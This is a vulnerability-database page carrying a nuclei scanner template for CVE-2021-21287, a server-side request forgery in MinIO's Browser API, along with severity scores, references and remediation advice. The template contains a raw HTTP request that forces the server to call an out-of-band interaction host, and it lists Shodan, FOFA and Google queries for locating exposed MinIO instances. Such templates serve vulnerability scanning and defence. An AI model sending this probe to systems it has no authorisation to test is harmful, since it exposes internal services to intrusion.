Lucene search
K

MinIO Browser API - Server-Side Request Forgery

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 51 Views

MinIO Browser API - SSRF Vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
AlpineLinux
CVE-2021-21287
1 Feb 202117:15
alpinelinux
ArchLinux
[ASA-202102-10] minio: directory traversal
6 Feb 202100:00
archlinux
Circl
CVE-2021-21287
1 Feb 202121:25
circl
CNNVD
Minio MinIO 代码问题漏洞
1 Feb 202100:00
cnnvd
CNVD
MinIO Cross-Site Request Forgery Vulnerability
3 Feb 202100:00
cnvd
CVE
CVE-2021-21287
1 Feb 202117:15
cve
Cvelist
CVE-2021-21287 Server-Side Request Forgery in MinIO Browser API
1 Feb 202117:15
cvelist
NVD
CVE-2021-21287
1 Feb 202118:15
nvd
OSV
BIT-MINIO-2021-21287 Server-Side Request Forgery in MinIO Browser API
6 Mar 202410:58
osv
OSV
CGA-CM65-7XJJ-2H4C
12 Jan 202617:05
osv
Rows per page
id: CVE-2021-21287

info:
  name: MinIO Browser API - Server-Side Request Forgery
  author: pikpikcu
  severity: high
  description: MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to make arbitrary requests on behalf of the server, potentially leading to unauthorized access or data leakage.
  remediation: |
    Apply the latest security patches or updates provided by MinIO to fix this vulnerability.
  reference:
    - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q
    - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html
    - https://github.com/minio/minio/pull/11337
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21287
    - https://github.com/minio/minio/commit/eb6871ecd960d570f70698877209e6db181bf276
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 7.7
    cve-id: CVE-2021-21287
    cwe-id: CWE-918
    epss-score: 0.24784
    epss-percentile: 0.97635
    cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: minio
    product: minio
    shodan-query:
      - http.title:"minio browser"
      - cpe:"cpe:2.3:a:minio:minio"
      - http.title:"minio console"
    fofa-query:
      - title="minio console"
      - app="minio"
      - title="minio browser"
    google-query:
      - intitle:"minio browser"
      - intitle:"minio console"
  tags: cve,cve2021,minio,ssrf,oast,vuln

http:
  - raw:
      - |
        POST /minio/webrpc HTTP/1.1
        Host: {{interactsh-url}}
        Content-Type: application/json
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
        Content-Length: 76

        {"id":1,"jsonrpc":"2.0","params":{"token":  "Test"},"method":"web.LoginSTS"}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http" # Confirms the HTTP Interaction

      - type: word
        words:
          - "We encountered an internal error"
# digest: 4b0a00483046022100c0cb811e255b6f839e1f7faac25459e33bbfc87f7653cde15fc0359928807ada022100b83112f949688a9b1ab93fbfec27c332ee19078d5a4f70ff3c00aa8c247d28e0:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 24
CVSS 3.17.7
EPSS0.24784
51